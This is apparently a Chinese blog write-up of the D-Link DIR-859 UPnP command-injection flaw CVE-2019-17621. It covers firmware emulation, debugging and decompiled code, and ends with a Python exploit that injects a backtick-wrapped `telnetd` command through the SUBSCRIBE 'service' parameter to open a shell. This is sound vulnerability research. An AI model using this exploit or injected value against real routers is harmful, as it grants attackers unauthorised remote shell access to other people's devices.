Mira1127
Mira1127

D-Link DIR-859的RCE漏洞 CVE-2019–17621

一、模拟运行固件
二、程序调试
三、漏洞分析
四、执行exp,获取shell

一、模拟运行固件

1.环境搭建

使用attifyos 中的环境进行模拟时可能会出现各种问题,后来自己搭建环境,可以正常运行。

  1. firmadyne 环境搭建: https://github.com/firmadyne/firmadyne
  2. qemu 编译安装:https://download.qemu.org/qemu-2.5.0.tar.bz2

qemu 建议使用 qemu-2.5.0 版本进行编译安装
在安装之前,请修复 linux-user/elfload.celf_check_ehdr 函数的一个 bug:
插入 && ehdr->e_shentsize == sizeof(struct elf_shdr) 这个条件

修改之前:

/* Verify the portions of EHDR outside of E_IDENT for the target.
   This has to wait until after bswapping the header.  */
static bool elf_check_ehdr(struct elfhdr *ehdr)
{
    return (elf_check_arch(ehdr->e_machine)
            && ehdr->e_ehsize == sizeof(struct elfhdr)
            && ehdr->e_phentsize == sizeof(struct elf_phdr)
            && (ehdr->e_type == ET_EXEC || ehdr->e_type == ET_DYN));
}

修改后:

static bool elf_check_ehdr(struct elfhdr *ehdr)
{
    return (elf_check_arch(ehdr->e_machine)
            && ehdr->e_ehsize == sizeof(struct elfhdr)
            && ehdr->e_phentsize == sizeof(struct elf_phdr)
			&& ehdr->e_shentsize == sizeof(struct elf_shdr)
            && (ehdr->e_type == ET_EXEC || ehdr->e_type == ET_DYN));
}

编译:

./configure --target-list="mips-linux-user mipsel-linux-user arm-linux-user" --static
sudo make -j8

2.模拟运行固件

  1. 将 DIR859Ax_FW105b03.bin 固件复制到 firmadyne 目录下

  2. 在firmadyne 目录下执行以下命令:

    sudo su
rm -rf images*
sh ./reset.sh
sudo -u postgres createdb -O firmadyne firmware
sudo -u postgres psql -d firmware < ./database/schema
./sources/extractor/extractor.py -b Dlink -sql 127.0.0.1 -np -nk "DIR859Ax_FW105b03.bin" images
./scripts/getArch.sh ./images/1.tar.gz	# 获取架构信息并保存到数据库中
./scripts/makeImage.sh 1				# 制作镜像文件成文件系统
./scripts/inferNetwork.sh 1				# 自动生成配置仿真环境网卡信息
./scratch/1/run.sh						# 运行仿真环境
ip 信息:

D-Link DIR-859的RCE漏洞 CVE-2019–17621_第1张图片
配置网卡信息是,本地会生成一个与 ip 同网段的网卡:
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第2张图片

运行固件:./scratch/1/run.sh

D-Link DIR-859的RCE漏洞 CVE-2019–17621_第3张图片
可以看出路由器固件 ip为: 192.168.0.1

浏览器中输入 192.168.0.1 访问仿真路由器:

D-Link DIR-859的RCE漏洞 CVE-2019–17621_第4张图片
至此,固件模拟运行成功。

二、程序调试

1. 启动 mips 系统

run-mips-sys.sh脚本信息如下:

oit@ubuntu:/home/qemu-vmsys/mips$ cat run-mips-sys.sh
sudo qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=ttyS0" -net nic,macaddr=00:0c:29:d4:72:11 -net tap -nographic

在这里插入图片描述
其中, msb_mips_gdbserver 是静态的 gdbserver, 之后用于 固件系统中程序的调试。信息如下:

oit@ubuntu:/home/qemu-vmsys/mips$ file ./msb_mips_gdbserver 
./msb_mips_gdbserver: ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

执行脚本启动 mips 系统: run-mips-sys.sh
输入 longin:root Password:root
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第5张图片

2. 挂载固件跟文件系统

  • 解包固件:binwalk -Me DIR859Ax_FW105b03.bin

    oit@ubuntu:~/tools/Template/dir_859$ binwalk -Me ./DIR859Ax_FW105b03.bin
    oit@ubuntu:~/tools/Template/dir_859$ cd _DIR859Ax_FW105b03.bin.extracted/D-Link DIR-859的RCE漏洞 CVE-2019–17621_第6张图片

  • 将跟文件系统 squashfs-root 和 msb_mips_gdbserver 传到 debian-mips系统中:
    在这里插入图片描述

  • 将 msb_mips_gdbserver 复制到 squashfs-root 目录下:
    cp ./msb_mips_gdbserver ./squashfs-root

  • 挂载跟文件系统并启动
    root@debian-mips:~#mount -o bind /dev/ ./squashfs-root/dev/
    root@debian-mips:~#mount -t proc /proc/ ./squashfs-root/proc/
    root@debian-mips:~#chroot ./squashfs-root sh
    查看文件系统中运行的进程:

     chroot ./squashfs-root shroot@debian-mips:~# chroot ./squashfs-root/ sh
 BusyBox v1.14.1 (2016-06-28 10:53:08 CST) built-in shell (msh)
 Enter 'help' for a list of built-in commands.
 
 # ps
   PID USER       VSZ STAT COMMAND
     1 0         2660 S    init [2]   
     2 0            0 SW   [kthreadd]
     3 0            0 SW   [ksoftirqd/0]
     6 0            0 SW   [watchdog/0]
     7 0            0 SW<  [cpuset]
     8 0            0 SW<  [khelper]
     9 0            0 SW   [kdevtmpfs]
    10 0            0 SW<  [netns]
    11 0            0 SW   [sync_supers]
    12 0            0 SW   [bdi-default]
    13 0            0 SW<  [kintegrityd]
    14 0            0 SW<  [kblockd]
    15 0            0 SW<  [ata_sff]
    16 0            0 SW<  [rpciod]
    18 0            0 SW   [khungtaskd]
    19 0            0 SW   [kswapd0]
    20 0            0 SWN  [ksmd]
    21 0            0 SW   [fsnotify_mark]
    22 0            0 SW<  [nfsiod]
    23 0            0 SW<  [crypto]
    26 0            0 SW   [scsi_eh_0]
    27 0            0 SW   [scsi_eh_1]
    28 0            0 SW   [kworker/u:1]
    31 0            0 SW   [kworker/u:3]
    32 0            0 SW   [jbd2/sda1-8]
    33 0            0 SW<  [ext4-dio-unwrit]
   157 0         3408 S    udevd --daemon 
   221 0            0 SW<  [kpsmoused]
   222 0            0 SW   [khubd]
   636 0         3344 S    udevd --daemon 
   637 0         3344 S    udevd --daemon 
  1631 0         5160 S    dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/d
  1633 0         3012 S    /sbin/rpcbind -w 
  1677 102       3400 S    /sbin/rpc.statd 
  1689 0         3412 S    /usr/sbin/rpc.idmapd 
  1960 0        29752 S    /usr/sbin/rsyslogd -c5 
  2009 1         2800 S    /usr/sbin/atd 
  2021 0         4536 S    /usr/sbin/cron 
  2167 0         7664 S    /usr/sbin/sshd 
  2345 101       8924 S    /usr/sbin/exim4 -bd -q30m 
  2372 0         2812 S    /sbin/getty 38400 tty1 
  2373 0         2812 S    /sbin/getty 38400 tty2 
  2374 0         2812 S    /sbin/getty 38400 tty3 
  2375 0         2812 S    /sbin/getty 38400 tty4 
  2376 0         2812 S    /sbin/getty 38400 tty5 
  2377 0         2812 S    /sbin/getty 38400 tty6 
  2378 0         4520 S    /bin/login --      
  2379 0         6120 S    -bash 
  2389 0        11144 S    sshd: root@pts/0  
  2391 0         6108 S    -bash 
  2399 0         2588 S    /usr/lib/openssh/sftp-server 
  2583 0            0 SW   [kworker/0:1]
  2896 0        11012 S    sshd: root@notty  
  2898 0         2588 S    /usr/lib/openssh/sftp-server 
  2937 0            0 SW   [kworker/0:0]
  3036 0            0 SW   [flush-8:0]
  3052 0            0 SW   [kworker/0:2]
  3057 0          856 S    sh 
  3058 0          748 R    ps 
  #

    查看网络:
    D-Link DIR-859的RCE漏洞 CVE-2019–17621_第7张图片
    由此可知,跟文件系统在mips系统中成功挂载并运行。

3. 程序调试测试:msb_mips_gdbserver、IDA

这里测试 /htdocs/cgibin 文件的远程调试( /htdocs/cgibin 后面会用到)

  • 执行 ./msb_mips_gdbserver 192.168.126.150:1234 /htdocs/cgibin
    远程ip: 192.168.126.150
    监听端口:1234
    /htdocs/cgibin:调试程序
    D-Link DIR-859的RCE漏洞 CVE-2019–17621_第8张图片
  • 将 /htdocs/cgibin 复制到 pc下,用ida打开
    在main 函数处下断点,按 F9运行->选择Remote GDB debuger
    D-Link DIR-859的RCE漏洞 CVE-2019–17621_第9张图片
    点击OK,输入Hostname 和 Port:(启动gdbserver 时设置的 )
    Hostname: 192.168.126.150
    Port:1234
    D-Link DIR-859的RCE漏洞 CVE-2019–17621_第10张图片
    点击OK,出现调试界面
    D-Link DIR-859的RCE漏洞 CVE-2019–17621_第11张图片
    F9 运行,执行到刚才main 函数断点处
    D-Link DIR-859的RCE漏洞 CVE-2019–17621_第12张图片
    由此可以看到,一切正常,说明环境配置及远程调试没有问题。

三、漏洞分析

对于漏洞分析,参考原文:
https://blog.csdn.net/NOSEC2019/article/details/103823845
根据纰漏,可知远程代码执行漏洞在UPnP请求的代码中

1. UPnP协议栈

UPnP是实现智能设备端到端网络连接的结构。它也是一种架构在TCP/IP和HTTP技术之上的,分布式、开放的网络结构,以使得在联网的设备间传递控制和数据。UPnP 技术实现了 控制点、 设备和 服务之间通讯的支持,并且设备和相关服务的也使用XML定义并且公布出来。使用UPnP,设备可以动态加入网络,自动获得一个IP地址,向其他设备公布它的能力或者获知其他设备的存在和服务,所有这些过程都是自动完成的,此后设备能够彼此直接通讯。
UPnP不需要设备驱动程序,因此使用UPnP建立的网络是介质无关的。同时UPnP使用标准的TCP/IP和网络协议,使它能够无缝的融入现有网络。构造UPnP应用程序时可以使用任何语言,并在任何操作系统平台上编译运行。对于设备的描述,使用HTML表单表述设备控制界面。它既允许设备供应商提供基于浏览器的用户界面和编程控制接口,也允许开发人员定制自己的设备界面。

2. 漏洞所在位置

在满足一定前置条件情况下,二进制可执行文件/htdocs/cgibin中的genacgi_main()函数包含了可远程执行代码的漏洞。

使用 ghidra 查看 genacgi_main() 函数的反编译代码:

undefined4 genacgi_main(void)

{
  char *pcVar1;
  char *env_http_callback;
  char *__s1;
  char *env_http_nt;
  char *env_REMOTE_ADDR;
  size_t sVar2;
  __pid_t pid;
  __pid_t _Var3;
  char *pcVar4;
  undefined4 uVar5;
  int iVar6;
  int iVar7;
  int iVar8;
  char buf8 [8];
  char acStack528 [500];
  undefined *local_18;
  
  local_18 = &_gp;
  pcVar4 = getenv("REQUEST_METHOD");
  if (pcVar4 == (char *)0x0) {
    return 0xffffffff;
  }
                    /* getenv */
  uVar5 = (**(code **)(local_18 + -0x7c90))("REQUEST_URI");
                    /* strchr */
  iVar6 = (**(code **)(local_18 + -0x7f78))(uVar5,0x3f);
  if (iVar6 == 0) {
    return 0xffffffff;
  }
                    /* strncmp */
  iVar7 = (**(code **)(local_18 + -0x7d44))(iVar6,"?service=",9);
  if (iVar7 != 0) {
    return 0xffffffff;
  }
                    /* strcasecmp */
  iVar7 = (**(code **)(local_18 + -0x7d30))(pcVar4,"SUBSCRIBE");
  uri_service = iVar6 + 9;
  if (iVar7 != 0) {
    iVar6 = (**(code **)(local_18 + -0x7d30))(pcVar4,"UNSUBSCRIBE");
    if (iVar6 != 0) {
      return 0xffffffff;
    }
    pcVar4 = getenv("SERVER_ID");
    if ((((pcVar4 == (char *)0x0) || (pcVar4 = getenv("HTTP_SID"), pcVar4 == (char *)0x0)) ||
        (pcVar4 = getenv("HTTP_CALLBACK"), pcVar4 != (char *)0x0)) ||
       (pcVar4 = getenv("HTTP_NT"), pcVar4 != (char *)0x0)) {
      cgibin_print_http_status(400,0x420554,0x420554);
    }
    else {
      pcVar4 = getenv("SERVER_ID");
      getenv("HTTP_SID");
      sprintf(acStack528,"%s\nINF_UID=%s\nSERVICE=%s\nMETHOD=UNSUBSCRIBE\nSID=%s\n",
              "/htdocs/upnp/run.NOTIFY.php",pcVar4);
      xmldbc_ephp(0,0,acStack528,stdout);
    }
    return 0;
  }
  env_server_id = getenv("SERVER_ID");
  env_http_sid = getenv("HTTP_SID");
  env_http_callback = getenv("HTTP_CALLBACK");
  env_http_timeout = getenv("HTTP_TIMEOUT");
  env_http_nt = getenv("HTTP_NT");
  env_REMOTE_ADDR = getenv("REMOTE_ADDR");
  if (env_http_sid == (char *)0x0) {
    iVar7 = strcmp(env_http_nt,"upnp:event");
    uVar5 = 0x19c;
    if ((iVar7 == 0) && (env_http_callback != (char *)0x0)) {
      iVar7 = strcasecmp(env_http_timeout,"Second-infinite");
      time_out = 0;
      if (iVar7 != 0) {
        iVar7 = strncasecmp(env_http_timeout,"Second-",7);
        uVar5 = 400;
        if (iVar7 != 0) goto LAB_004103d8;
        time_out = atoi(env_http_timeout + 7);
      }
      sVar2 = strlen(env_http_callback);
      if (env_http_callback[sVar2 - 1] == '>') {
        env_http_callback[sVar2 - 1] = '\0';
      }
      env_http_callback = env_http_callback + (uint)(*env_http_callback == '<');
      iVar7 = strncmp(env_http_callback,"http://",7);
      uVar5 = 0x19c;
      if (iVar7 == 0) {
        http_callbak_uri = strchr(env_http_callback + 7,0x2f);
        if (http_callbak_uri != (char *)0x0) {
          *http_callbak_uri = '\0';
          pid = getpid();
          sprintf(buf8,
                  "%s\nMETHOD=SUBSCRIBE\nINF_UID=%s\nSERVICE=%s\nHOST=%s\nURI=/%s\nTIMEOUT=%d\nREMOTE=%s\nSHELL_FILE=%s/%s_%d.sh"
                  ,"/htdocs/upnp/run.NOTIFY.php",env_server_id,uri_service,env_http_callback + 7, http_callbak_uri+ 1,time_out
                  ,env_REMOTE_ADDR,"/var/run",uri_service,pid);
          xmldbc_ephp(0,0,buf8,stdout);
          fflush(stdout);
          _Var3 = getpid();
          sprintf(buf8,"NOTIFY:0:sh %s/%s_%d.sh","/var/run",iVar6,_Var3);
          xmldbc_timer(0,0,buf8);
          return 0;
        }
        uVar5 = 0x19c;
      }
    }
  }
  else {
    uVar5 = 400;
    if ((env_http_callback == (char *)0x0) && (env_http_nt == (char *)0x0)) {
      iVar7 = strcasecmp(__s1,"Second-infinite");
      iVar8 = 0;
      if (iVar7 != 0) {
        iVar7 = strncasecmp(__s1,"Second-",7);
        uVar5 = 400;
        if (iVar7 != 0) goto LAB_004103d8;
        iVar8 = atoi(__s1 + 7);
      }
      sprintf(buf8,
              "%s\nMETHOD=SUBSCRIBE\nINF_UID=%s\nSERVICE=%s\nSID=%s\nTIMEOUT=%d\nSHELL_FILE=%s/%s.sh"
              ,"/htdocs/upnp/run.NOTIFY.php",pcVar4,iVar6,pcVar1,iVar8,"/var/run",iVar6);
      xmldbc_ephp(0,0,buf8,stdout);
      return 0;
    }
  }
LAB_004103d8:
  cgibin_print_http_status(uVar5,0x420554,0x420554);
  return 0;
}

在反编译代码中,sprintf()设置了一个包含所有值的缓冲区,其中函数参数 ?service=及其值,随后由 xmldbc_ephp()函数(最后调用send())将“buffer8”中包含的数据发送给PHP。

sprintf(buf8,"%s\nMETHOD=SUBSCRIBE\nINF_UID=%s\nSERVICE=%s\nHOST=%s\nURI=/%s\nTIMEOUT=%d\nREMOTE=%s\nSHELL_FILE=%s/%s_%d.sh" ,
"/htdocs/upnp/run.NOTIFY.php",env_server_id,uri_service,env_http_callback + 7, http_callbak_uri+ 1,time_out ,env_REMOTE_ADDR,"/var/run",uri_service,pid);
xmldbc_ephp(0,0,buf8,stdout);

根据反汇编代码,可以看出,sprintf()用于连接多个变量的值,填充一个缓冲区,设置要传递的新变量,其中SHELL_FILE将以格式%s_%d.sh进行传递,主要用于为新的shell脚本命名
根据执行 sprintf() 成立的条件,调试时需要设置以下环境变量

export REQUEST_URI="SUBSCRIBE /gena.cgi?service=\`telnetd\`"
export REMOTE_ADDR="192.168.126.150"
export REQUEST_METHOD="SUBSCRIBE"
export CONTENT_TYPE="application/x-www-form-urlencoded"
export HTTP_COOKIE="aaaaaaaa"
export HTTP_TIMEOUT="Second-1800"
export HTTP_NT="upnp:event"
export HTTP_CALLBACK="/"

修复环境:

mkdir -p /var/htdocs/upnp/LAN-1/
ln -s /htdocs/cgibin 	/var/htdocs/upnp/LAN-1/gena.cgi

调试程序,执行到 sprintf:

./gdbserver_msb 192.168.126.150:1234 /var/htdocs/upnp/LAN-1/gena.cgi

数据被复制到“buffer8”缓冲区后,内存中的数据设置如下:
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第13张图片
缓冲区中的数据,经过xmldbc_ephp处理,由PHP文件run.NOTIFY.php进行处理,如下:

void xmldbc_ephp(undefined4 param_1,undefined4 param_2,char *pbuf8,int stdout)

{
  size_t buf_size;
  
  buf_size = strlen(pbuf8);
  buf_size._2_2_ = (short)buf_size;
  FUN_0041420c(param_1,10,param_2,pbuf8,buf_size._2_2_ + 1,stdout);
  return;
}

undefined4
FUN_0041420c(undefined4 param_1,uint param_2,undefined4 param_3,void *pbuf,ushort buf_size,
            int in_stdout)

{
  int fd;
  int iVar1;
  undefined4 uVar2;
  
  fd = _connect();
  uVar2 = 0xffffffff;
  if (-1 < fd) {
    iVar1 = FUN_00413810(fd,(short)param_2,param_3,pbuf,buf_size);
    uVar2 = 0xffffffff;
    if (-1 < iVar1) {
      if (in_stdout == 0) {
        in_stdout = stdout;
      }
      FUN_00414094(fd,in_stdout);
      uVar2 = 0;
    }
    close(fd);
  }
  return uVar2;
}

int _connect(char *pcParm1)

{
  int __fd;
  int iVar1;
  int iVar2;
  sockaddr local_80 [7];
  
  __fd = socket(1,2,0);
  if (__fd < 0) {
    iVar2 = -1;
  }
  else {
    fcntl(__fd,2,1);
    if (pcParm1 == (char *)0x0) {
      pcParm1 = "/var/run/xmldb_sock";
    }
    local_80[0].sa_family = 1;
    snprintf(local_80[0].sa_data,0x6c,"%s",pcParm1);
    iVar1 = connect(__fd,local_80,0x6e);
    iVar2 = __fd;
    if (iVar1 < 0) {
      iVar2 = -1;
      close(__fd);
    }
  }
  return iVar2;
}

流程: buf8->xmldbc_ephp->FUN_0041420c->_connect-> connect

run.NOTIFY.php文件


include "/htdocs/phplib/upnp/xnode.php";
include "/htdocs/upnpinc/gvar.php";
include "/htdocs/upnpinc/gena.php";

$gena_path = XNODE_getpathbytarget($G_GENA_NODEBASE, "inf", "uid", $INF_UID, 1);
$gena_path = $gena_path."/".$SERVICE;
GENA_subscribe_cleanup($gena_path);

/* IGD services */
if		($SERVICE == "L3Forwarding1")	$php = "NOTIFY.Layer3Forwarding.1.php";
else if ($SERVICE == "OSInfo1")			$php = "NOTIFY.OSInfo.1.php";
else if ($SERVICE == "WANCommonIFC1")	$php = "NOTIFY.WANCommonInterfaceConfig.1.php";
else if ($SERVICE == "WANEthLinkC1")	$php = "NOTIFY.WANEthernetLinkConfig.1.php";
else if ($SERVICE == "WANIPConn1")		$php = "NOTIFY.WANIPConnection.1.php";
/* WFA services */
else if ($SERVICE == "WFAWLANConfig1")	$php = "NOTIFY.WFAWLANConfig.1.php";


if ($METHOD == "SUBSCRIBE")
{
	if ($SID == "")
		GENA_subscribe_new($gena_path, $HOST, $REMOTE, $URI, $TIMEOUT, $SHELL_FILE, "/htdocs/upnp/".$php, $INF_UID);
	else
		GENA_subscribe_sid($gena_path, $SID,  $TIMEOUT);
}
else if ($METHOD == "UNSUBSCRIBE")
{
	GENA_unsubscribe($gena_path, $SID);
}
?>

根据环境的设置,该脚本会调用PHP 函数 GENA_subscribe_new(),并传递cgibin程序中genacgi_main()函数获得的变量,还包括变量SHELL_FILE
根据搜索,可知 GENA_subscribe_new()定义在 gena.php文件中
gena.php文件:


include "/htdocs/phplib/xnode.php";
include "/htdocs/phplib/trace.php";
include "/htdocs/phplib/phyinf.php";

function GENA_notify_init($shell_file, $target_php, $inf_uid, $host, $uri, $sid)
{

	$inf_path = XNODE_getpathbytarget("", "inf", "uid", $inf_uid, 0);
	if ($inf_path=="")
	{
		TRACE_debug("can't find inf_path by $inf_uid=".$inf_uid."!");
		return "";
	}
	$phyinf = PHYINF_getifname(query($inf_path."/phyinf"));
	if ($phyinf == "")
	{
		TRACE_debug("can't get phyinf by $inf_uid=".$inf_uid."!");
		return "";
	}

	$upnpmsg = query("/runtime/upnpmsg");
	if ($upnpmsg == "") $upnpmsg = "/dev/null";
	fwrite(w, $shell_file,
		"#!/bin/sh\n".
		'echo "[$0] ..." > '.$upnpmsg."\n".
		"xmldbc -P ".$target_php.
			" -V INF_UID=".$inf_uid.
			" -V HDR_URL=".$uri.
			" -V HDR_HOST=".$host.
			" -V HDR_SID=".$sid.
			" -V HDR_SEQ=0".
			" | httpc -i ".$phyinf." -d \"".$host."\" -p TCP > ".$upnpmsg."\n"
	);
	fwrite(a, $shell_file, "rm -f ".$shell_file."\n");
}

/***************************************************************/
/* construct the NOTIFY request event header */
function GENA_notify_req_event_hdr($url, $host, $content_len, $sid, $seq, $outputfile)
{
	if ($outputfile!="")
	{
		fwrite("w", $outputfile, "NOTIFY ".$url." HTTP/1.1\r\n");
		fwrite("a", $outputfile, "HOST: ".$host."\r\n");
		fwrite("a", $outputfile, "CONTENT-TYPE: text/xml\r\n");
		fwrite("a", $outputfile, "CONTENT-LENGTH: ".$content_len."\r\n");
		fwrite("a", $outputfile, "NT: upnp:event\r\n");
		fwrite("a", $outputfile, "NTS: upnp:propchange\r\n");
		fwrite("a", $outputfile, "SID: ".$sid."\r\n");
		fwrite("a", $outputfile, "SEQ: ".$seq."\r\n\r\n");
	}
	else
	{
		echo "NOTIFY ".$url." HTTP/1.1\r\n";
		echo "HOST: ".$host."\r\n";
		echo "CONTENT-TYPE: text/xml\r\n";
		echo "CONTENT-LENGTH: ".$content_len."\r\n";
		echo "NT: upnp:event\r\n";
		echo "NTS: upnp:propchange\r\n";
		echo "SID: ".$sid."\r\n";
		echo "SEQ: ".$seq."\r\n\r\n";
	}
}

function GENA_subscribe_http_resp($sid, $timeout)
{
	/* Generate HTTP header */
	echo "HTTP/1.1 200 OK\r\n";
	echo "SID: ".$sid."\r\n";
	echo "TIMEOUT: ";
	if ($timeout == 0) echo "Second-infinite";
	else echo "Second-".$timeout;
	echo "\r\n\r\n";
}

function GENA_subscribe_cleanup($node_base)
{
	$curr_time = query("/runtime/device/uptime");

	anchor($node_base);
	$count = query("subscription#");
	while ($count > 0)
	{
		$tout = query("subscription:".$count."/timeout");
		if ($tout > 0 && $tout < $curr_time) del("subscription:".$count);
		$count--;
	}
}

function GENA_subscribe_new($node_base, $host, $remote, $uri, $timeout, $shell_file, $target_php, $inf_uid)
{
	anchor($node_base);
	$count = query("subscription#");
	$found = 0;
	/* find subscription index & uuid */
	foreach ("subscription")
	{
		if (query("host")==$host && query("uri")==$uri)	{$found = $InDeX; break;}
	}
	if ($found == 0)
	{
		$index = $count + 1;
		$new_uuid = "uuid:".query("/runtime/genuuid");
	}
	else
	{
		$index = $found;
		$new_uuid = query("subscription:".$index."/uuid");
	}

	/* get timeout */
	if ($timeout==0 || $timeout=="") {$timeout = 0; $new_timeout = 0;}
	else {$new_timeout = query("/runtime/device/uptime") + $timeout;}
	/* set to nodes */
	set("subscription:".$index."/remote",	$remote);
	set("subscription:".$index."/uuid",		$new_uuid);
	set("subscription:".$index."/host",		$host);
	set("subscription:".$index."/uri",		$uri);
	set("subscription:".$index."/timeout",	$new_timeout);
	set("subscription:".$index."/seq", "1");

	GENA_subscribe_http_resp($new_uuid, $timeout);
	GENA_notify_init($shell_file, $target_php, $inf_uid, $host, $uri, $new_uuid);
}

function GENA_subscribe_sid($node_base, $sid, $timeout)
{
	...
}

function GENA_unsubscribe($node_base, $sid)
{
	...
}
?>

GENA_subscribe_new功能上分析可知函数并不修改 $shell_file 变量。GENA_subscribe_new传递 $shell_file 到 GENA_notify_init函数,也是shell_file最终处理的地方:通过调用 PHP 函数 fwrite()创建新文件。

fwrite() 函数被使用了两次:
第一次创建文件,文件名由 可控的 SHELL_FILE变量(uri_service)以及getpid()组成:
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第14张图片
第二次调用fwrite()向文件中添加 删除命令 "rm -f ".$shell_file."\n",(漏洞点触发原因):
进行攻击时,只需要插入一个反引号包裹的系统命令,将其注入到shell 脚本中。在脚本执行 rm 命令时因遇到 反引号而失败,继续执行引号里面的系统命令,从而达到远程命令执行漏洞的触发。
所以,只要控制好 "/gena.cgi?service=shell_file"中 shell_file的内容为 反引号包裹的系统命令,就可以触发漏洞。

四、执行exp,获取shell

1. 模拟运行路由器固件(见 一、),查看端口:

D-Link DIR-859的RCE漏洞 CVE-2019–17621_第15张图片
使用49152 端口
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第16张图片

2.exp:

import socket
import os
from time import sleep

def httpSUB(server, port, shell_file):
    # print('\n[*] Connection {host}:{port}').format(host=server, port=port)
    con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    request = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0\n"
    request += "Host: " + str(server) + str(port) + "\n"
    request += "Callback: \n"
    request += "NT: upnp:event\n"
    request += "Timeout: Second-1800\n"
    request += "Accept-Encoding: gzip, deflate\n"
    request += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50\n\n"

    sleep(1)
    print('[*] Sending Payload')
    con.connect((socket.gethostbyname(server),port))
    con.send(request.encode())
    results = con.recv(4096)

    sleep(1)
    print('[*] Running Telnetd Service')

serverInput = raw_input('IP Router: ')
portInput = 49152

httpSUB(serverInput, portInput, '`telnetd`')

通过漏洞,开启telnetd服务:
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第17张图片
执行 telnetd 192.168.0.1获取shell
D-Link DIR-859的RCE漏洞 CVE-2019–17621_第18张图片

参考链接:

https://blog.csdn.net/NOSEC2019/article/details/103823845

你可能感兴趣的:(linux,pwn)

  • android系统selinux中添加新属性property 辉色投像
    1.定位/android/system/sepolicy/private/property_contexts声明属性开头:persist.charge声明属性类型:u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
  • Linux下QT开发的动态库界面弹出操作(SDL2) 13jjyao QT类qt开发语言sdl2linux
    需求:操作系统为linux,开发框架为qt,做成需带界面的qt动态库,调用方为java等非qt程序难点:调用方为java等非qt程序,也就是说调用方肯定不带QApplication::exec(),缺少了这个,QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出);这与qt调用本身qt库是有本质的区别的思路:1.调用方缺QApplication::exec(),那么我们在接口
  • linux sdl windows.h,Windows下的SDL安装 奔跑吧linux内核 linuxsdlwindows.h
    首先你要下载并安装SDL开发包。如果装在C盘下,路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤:1.打开VC++,点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4,现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
  • linux中sdl的使用教程,sdl使用入门 Melissa Corvinus linux中sdl的使用教程
    本文通过一个简单示例讲解SDL的基本使用流程。示例中展示一个窗口,窗口里面有个随机颜色快随机移动。当我们鼠标点击关闭按钮时间窗口关闭。基本步骤如下:1.初始化SDL并创建一个窗口。SDL_Init()初始化SDL_CreateWindow()创建窗口2.纹理渲染存储RGB和存储纹理的区别:比如一个从左到右由红色渐变到蓝色的矩形,用存储RGB的话就需要把矩形中每个点的具体颜色值存储下来;而纹理只是一
  • PHP环境搭建详细教程 好看资源平台 前端php
    PHP是一个流行的服务器端脚本语言,广泛用于Web开发。为了使PHP能够在本地或服务器上运行,我们需要搭建一个合适的PHP环境。本教程将结合最新资料,介绍在不同操作系统上搭建PHP开发环境的多种方法,包括Windows、macOS和Linux系统的安装步骤,以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类:集成开发环境:例如XAMPP、WAMP、MAMP,这
  • 使用 FinalShell 进行远程连接(ssh 远程连接 Linux 服务器) 编程经验分享 开发工具服务器sshlinux
    目录前言基本使用教程新建远程连接连接主机自定义命令路由追踪前言后端开发,必然需要和服务器打交道,部署应用,排查问题,查看运行日志等等。一般服务器都是集中部署在机房中,也有一些直接是云服务器,总而言之,程序员不可能直接和服务器直接操作,一般都是通过ssh连接来登录服务器。刚接触远程连接时,使用的是XSHELL来远程连接服务器,连接上就能够操作远程服务器了,但是仅用XSHELL并没有上传下载文件的功能
  • libyuv之linux编译 jaronho Linuxlinux运维服务器
    文章目录一、下载源码二、编译源码三、注意事项1、银河麒麟系统(aarch64)(1)解决armv8-a+dotprod+i8mm指令集支持问题(2)解决armv9-a+sve2指令集支持问题一、下载源码到GitHub网站下载https://github.com/lemenkov/libyuv源码,或者用直接用git克隆到本地,如:gitclonehttps://github.com/lemenko
  • ARM驱动学习之5 LEDS驱动 JT灬新一 嵌入式C底层arm开发学习单片机
    ARM驱动学习之5LEDS驱动知识点:•linuxGPIO申请函数和赋值函数–gpio_request–gpio_set_value•三星平台配置GPIO函数–s3c_gpio_cfgpin•GPIO配置输出模式的宏变量–S3C_GPIO_OUTPUT注意点:DRIVER_NAME和DEVICE_NAME匹配。实现步骤:1.加入需要的头文件://Linux平台的gpio头文件#include//三
  • 【华为OD技术面试真题精选 - 非技术题】 -HR面,综合面_华为od hr面 一个射手座的程序媛 程序员华为od面试职场和发展
    最后的话最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!资料预览给大家整理的视频资料:给大家整理的电子书资料:如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以点击这里获
  • 简介Shell、zsh、bash zhaosuningsn Shellzshbashshelllinuxbash
    Shell是Linux和Unix的外壳,类似衣服,负责外界与Linux和Unix内核的交互联系。例如接收终端用户及各种应用程序的命令,把接收的命令翻译成内核能理解的语言,传递给内核,并把内核处理接收的命令的结果返回给外界,即Shell是外界和内核沟通的桥梁或大门。Linux和Unix提供了多种Shell,其中有种bash,当然还有其他好多种。Mac电脑中不但有bash,还有一个zsh,预装的,据说
  • Linux MariaDB使用OpenSSL安装SSL证书 Meta39 MySQLOracleMariaDBLinuxWindowsssllinuxmariadb
